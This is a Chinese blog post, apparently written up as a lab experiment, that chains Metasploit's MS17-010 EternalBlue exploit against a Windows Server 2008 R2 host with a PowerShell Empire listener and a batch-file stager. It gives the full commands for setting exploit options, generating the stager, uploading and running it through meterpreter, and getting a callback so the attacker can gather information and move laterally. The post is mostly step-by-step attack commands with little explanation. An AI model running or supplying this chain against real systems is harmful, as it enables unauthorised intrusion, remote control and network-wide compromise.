msf+empire组合使用实验

目录

一、metasploit建立反弹连接

1.1.  先启动msfconsole

1.2. 查找exploit

1.3. 使用exploit,设置选项

1.4. 执行结果 

二、制作empire木马

2.1. 开启监听器

2.2. 制作木马

三、empire接入目标主机

3.1. 上传empire木马文件

3.2. empire连到目标主机

四、思考


一、metasploit建立反弹连接

1.1.  先启动msfconsole

msfconsole

1.2. 查找exploit

search ms17_010

1.3. 使用exploit,设置选项

use exploit/windows/smb/ms17_010_eternalblue
set LHOST 192.168.101.58
set RHOST 192.168.101.102
set target 3
#target 3 是Windows Server 2008 R2
run

1.4. 执行结果 

二、制作empire木马

2.1. 开启监听器

(Empire) > uselistener http
(Empire: uselistener/http) > set Name test1
(Empire: uselistener/http) > set Host 192.168.101.58:8800
(Empire: uselistener/http) > set Port 8800
(Empire: uselistener/http) > execute

2.2. 制作木马

usestager windows/launcher_bat
set Listener test1
        生成的木马放在路径/usr/share/powershell-empire/empire/client/generated-stagers/目录下

三、empire接入目标主机

3.1. 上传empire木马文件

        回到metasploit反弹连接,上传木马,并执行
meterpreter > cd c:\\
upload /usr/share/powershell-empire/empire/client/generated-stagers/launcher.bat
shell
launcher.bat
        可以看到目标主机在empire上线:

3.2. empire连到目标主机

        interact交互进目标主机,做一些想做的事情了,比如信息收集、内网横向

四、思考

        为什么用ms17_010的exploit可以直接反弹,而不需要往目标机器投放木马呢?这个是利用操作系统的漏洞进行的反弹连接。
        为什么有的系统需要往目标机器投放木马呢?通用做法是制作投放木马,在目标主机上可以建立反弹连接。
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

見贤思齊

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值